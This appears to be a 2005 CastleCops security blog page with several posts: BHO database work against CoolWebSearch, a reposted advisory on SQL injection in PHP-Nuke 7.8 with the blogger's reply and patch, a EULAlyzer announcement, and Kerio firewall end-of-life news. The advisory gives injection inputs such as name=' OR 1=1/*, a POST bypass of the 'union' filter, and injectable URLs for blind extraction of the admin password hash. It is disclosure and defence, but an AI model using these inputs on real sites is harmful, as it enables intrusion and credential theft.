CastleCops ramps up fight against CoolWebSearch/HomeSearch

CastleCops keeps and maintains various databases on malware and legitimate items for browser helpers objects, toolbars, startups, services, and activex objects.

Thanks to the collaboration of many Team CastleCops Expert members, CC is frequently among the first to indentify and analyze a new emerging pest, and hence to add information on its components to the various Lists. We were for example the first to spot and categorize a new BHO co-responsible for an all new version of SpySheriff/PsGuard/SmitFraud, one of the most insidious and prevalent pests around:

/tk6387-hp_tmp_random_char_or_digit.html

CastleCops is also in progress of entering all BHOs pertaining to the notorious CoolWebSearch/HomeSearch parasite variant to its CLSID database list. That information is used to power publicly accessible applications such as (in addition to researcher based utilities):

BHODemon
BHOList

The BHO database in its entirety is made available to the public here:

/CLSID.html<!–

–>

[NewAngels Advisory #7]PHP Nuke <= 7.8 Multiple SQL Injections

So there is this advisory which is released:



[NewAngels Advisory #7]PHP Nuke <= 7.8 Multiple SQL Injections
========================================================================
=====

Software: PHP Nuke 7.8
Type: SQL Injections
Risk: High

Date: Sep. 10 2005
Vendor: PHP-Nuke (phpnuke.org)

Credit:
=======
Robin ‘onkel_fisch’ Verton from it-security23.net

Description:
============
PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet.
The Administrator has total control of his web site, registered users, and he will have in the hand
a powerful assembly of tools to maintain an active and 100% interactive web site using databases.
[http://www.phpnuke.org/]

Vulnerability:
==============

PHP Nuke 7.8 is prone to multiple SQL injection vulnerabilities.
These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.

In the modules.php

$result = $db->sql_query(“SELECT active, view FROM “.$prefix.”_modules WHERE title=’$name'”);

The $name variable is not checked so you could inject malicious SQL Code. In an file which is included whe have the following code:

$queryString = strtolower($_SERVER[‘QUERY_STRING’]);
if (stripos_clone($queryString,’%20union%20′) OR stripos_clone($queryString,’/*’) OR stripos_clone($queryString,’*/union/*’) OR stripos_clone($queryString,’c2nyaxb0′)) {
header(“Location: index.php”);
die();
}

[…]

if (!ini_get(“register_globals”)) {
import_request_variables(‘GPC’);
}

So you can use UNION in a GET var. But because they use register_globals or impor_request_variables you can send
the malicous SQL-Code via POST so it is not checked if you insert an “union”.

http://www.example.com/modules.php POST: name=’ OR 1=1/*
will produce an error, neither
http://www.example.com/modules.php POST: name=’ OR 1=2/*
will only tell you taht the requestet ‘modul’ is not active, so you can read out the admin password hahs via blind injections.

Additionaly there are a few SQL-Injections in the modules.
Here a few examples:

http://www.example.com/modules.php?name=News&file=article&sid=[SQL] – here the same as above, send this via POST to
bypass the ‘union’-cover

http://www.example.com/modules.php?name=News&file=comments&Reply&pid=[SQ
L]

http://www.example.com/modules.php?name=News&file=comments&op=Reply&pid=
[SQL]

http://www.example.com/modules.php?name=News&file=comments&op=Reply&sid=
[SQL]

Greets:
==============
CyberDead, atomic, sirius_
Whole secured-pussy.de Team
Zealots 😀 😀


Of course I’m not thrilled so I just had to reply:



The $name variable and others like $sid are expected via $_GET and not
$_POST.  The proper start to sanitizing the data here is to ensure that
$name is obtained via $_GET and not injected by $_POST, $_COOKIE, or
anything else.


Since you did two things I’m avidly against:


1) no vendor contact information
2) no suggested patches


I wanted to reply and alert folks who run PHP-Nuke and its forks since
after running a cursory search on some popular PHP-Nuke sites I saw
nothing about this:


http://en.wikipedia.org/wiki/Php-nuke


About the above suggestion.


To be specific, find the modules.php file and check for the first instance
of “$name”.  An example:


if (isset($name)) {


Prior to that, simply put in such a line:


$name = $_GET[‘name’];


You’re forcing the $name variable to be set by the HTTP GET request,
rather than inject a value by a cookie or post ($_COOKIE, $_POST
respectively).

The same applies to the rest of the code for other variables.

EULAlyzer 1.0 Released – Analyze License Agreements!


General News
Javacool writes EULAlyzer 1.0 Released!

Analyze license agreements for interesting words and phrases!

End user license agreements (EULAs) are the bane of most computer users. No one wants to read through pages and pages of boring text, and many people skip reading them altogether. But it can be dangerous not to read license agreements – you might miss important information about software or bundled components, plus you have no idea what you could be agreeing to.

But now there’s a way of making that much easier.

EULAlyzer – Making it all easy!

EULAlyzer can analyze license agreements in seconds, and provide a detailed listing of potentially interesting words and phrases. Discover if the software you’re about to install displays pop-up ads, transmits personally identifiable information, uses unique identifiers to track you, or much much more.

The Benefits:

  • Discover potentially hidden behavior about the software you’re going to install

  • Pick up on things you missed when reading license agreements

  • Keep a saved database of the license agreements you view

  • Instant results – super-fast analysis in just a second

    When installing software, never just click past the license agreement. Pop it into EULAlyzer, and EULAlyze it!

    EULAlyzer Personal is free for personal and educational use.

    More information and download: http://www.javacoolsoftware.com/eulalyzer.html

    P.S. Want active, automatic protection? Help support the development of this program, and check out EULAlyzer Pro!<!–

    –> “

  • KPF: End of Life December 31st 2005

    Joshua Thomas from Kerio has announced that Kerio Personal Firewall will reach end of life.

    Hello all,

    Kerio Technologies has grown into a significant player in both security and messaging markets. We have achieved many accolades, and we have many satisfied customers all over the world.

    Kerio now employs over one hundred people in our three offices worldwide. We want to continue to deliver products that you enjoy to use. We made a promise to give our customers the best products in their category. And that means implementing some changes in our product strategy.

    During the second half of this year, Kerio will be discontinuing two host-based security products from our portfolio – Kerio ServerFirewall and Kerio Personal Firewall.

    Kerio Personal Firewall will be discontinued as of December 31, 2005. It will not be available for purchase after this date. Subscriptions will not be renewed. Technical support will be provided to all customers with valid subscriptions until the end of 2006.

    Thank you for your support of Kerio.

    Cheers,
    Joshua Thomas